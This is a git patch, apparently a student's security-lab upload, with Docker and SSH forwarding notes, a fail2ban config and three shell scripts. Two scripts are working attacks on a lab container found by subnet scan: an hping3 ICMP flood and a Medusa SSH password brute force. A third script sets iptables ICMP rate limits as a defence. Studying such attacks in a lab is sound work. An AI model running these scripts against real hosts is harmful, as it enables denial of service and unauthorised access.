From 3da4ef188f8d179a0d0a49dcef2c7a410a86ba40 Mon Sep 17 00:00:00 2001 From: petroskaridis Date: Wed, 27 Jan 2021 12:39:35 +0000 Subject: [PATCH] Upload files to '' --- docker notes.txt | 62 +++++++++++++++++++++++++++++++++++++++++ fail2baninfo.txt | 7 +++++ master_icmp_ddos.sh | 15 ++++++++++ ssh_medusa.sh | 8 ++++++ worker_ddos_firewall.sh | 23 +++++++++++++++ 5 files changed, 115 insertions(+) create mode 100644 docker notes.txt create mode 100644 fail2baninfo.txt create mode 100644 master_icmp_ddos.sh create mode 100644 ssh_medusa.sh create mode 100644 worker_ddos_firewall.sh diff --git a/docker notes.txt b/docker notes.txt new file mode 100644 index 0000000..b988b23 --- /dev/null +++ b/docker notes.txt @@ -0,0 +1,62 @@ +../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5 +../install/usr/share/swarmlab.io/sec/swarmlab-sec login + + + + +/*ssh local forwarding*/ +{ +sudo apt install lynx -y (προγραμμα για link σε ένα host port) +sudo apt install apache2 -y (κατεβασμα apache στον worker που θα κάνει forward) +apache2ctl start (εκκίνηση apache server) + +lynx localhost +netstat -antlupe|grep 80 +ssh docker@workerforw -L 5000:workerforw:80 (σύνδεση στην υπηρεσία από οποιοδήποτε container) + +lynx http://localhost:5000 +} + +/*ssh remote forwarding*/ +{ +ssh -R 5000:localhost:80 docker@remotehost (execute at container with service on port 80) +lynx localhost:5000 (execute at remotehost) +} + + + + +{ +inventory.yml +run.sh +test.yml +} after all clusters' ips are in inventory, we go: + +chmod +x ./run.sh +./run.sh + + + + + + + + + +/*shut down cluster*/ +../install/usr/share/swarmlab.io/sec/swarmlab-sec down + + +#in case docker images are full +docker rmi -f $(docker images -a -q) +docker rm -f $(docker container -a -q) + +/*fail2ban config*/ +{ +filter (fail2ban looks for the sshd service) +logpath (stores all authentication attempts made) +maxretry (bans IP after 4 wrong passwords) +bantime (86400 = 1 day) +ignoreip (type sys admin ip here) +} + diff --git a/fail2baninfo.txt b/fail2baninfo.txt new file mode 100644 index 0000000..c9a7f2f --- /dev/null +++ b/fail2baninfo.txt @@ -0,0 +1,7 @@ +[sshd] +enabled = true +port = ssh +filter = sshd +logpath = /var/log/auth.log +maxretry = 4 +bantime = 86400 diff --git a/master_icmp_ddos.sh b/master_icmp_ddos.sh new file mode 100644 index 0000000..5bf619b --- /dev/null +++ b/master_icmp_ddos.sh @@ -0,0 +1,15 @@ +sudo apt update +sudo apt upgrade -y +sudo apt install hping3 -y +netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/') +clear +echo "Target network: " $netip +#Find worker1 victim IP +worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()') +#Ddos attack to worker1 with syn flood at port 80 and icmp protocol +echo "Initiate attack towards worker 1 with IP: "$worker1 +sudo hping3 -p 80 --flood --icmp $worker1 + + + + diff --git a/ssh_medusa.sh b/ssh_medusa.sh new file mode 100644 index 0000000..8fb01bc --- /dev/null +++ b/ssh_medusa.sh @@ -0,0 +1,8 @@ +sudo apt update +sudo apt upgrade -y +sudo apt install medusa -y +echo "Finding victim worker IP" +netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/') +worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()') +echo "Starting ssh brute force attack with medusa" +medusa -u docker -P dictionary.txt -h $worker1 -M ssh diff --git a/worker_ddos_firewall.sh b/worker_ddos_firewall.sh new file mode 100644 index 0000000..a1a4d9e --- /dev/null +++ b/worker_ddos_firewall.sh @@ -0,0 +1,23 @@ +sudo apt update +sudo apt upgrade -y +#Find worker1 IP +worker1=$(ifconfig|grep inet|sed -n lp|awk "{print \$2}") +clear +sudo iptables -F +echo "2 sec ICMP packet sniffing" +sleep 2s +sudo timeout 2s tcpdump -i eth0 icmp $worker1 +sleep 2s +echo "New iptables rules" +#clean iptables rules from previous script runs +sudo iptables -X +sudo iptables -N icmp_flood +sudo iptables -A INPUT -p icmp -j icmp_flood +#limit icmp_flood to 1 packets per second +sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN +sudo iptables -A icmp_flood -j DROP +sleep 2s +echo "2 sec ICMP packet sniffing after iptables config" +sleep 2s +sudo timeout 2s tcpdump -i eth0 icmp $worker1 +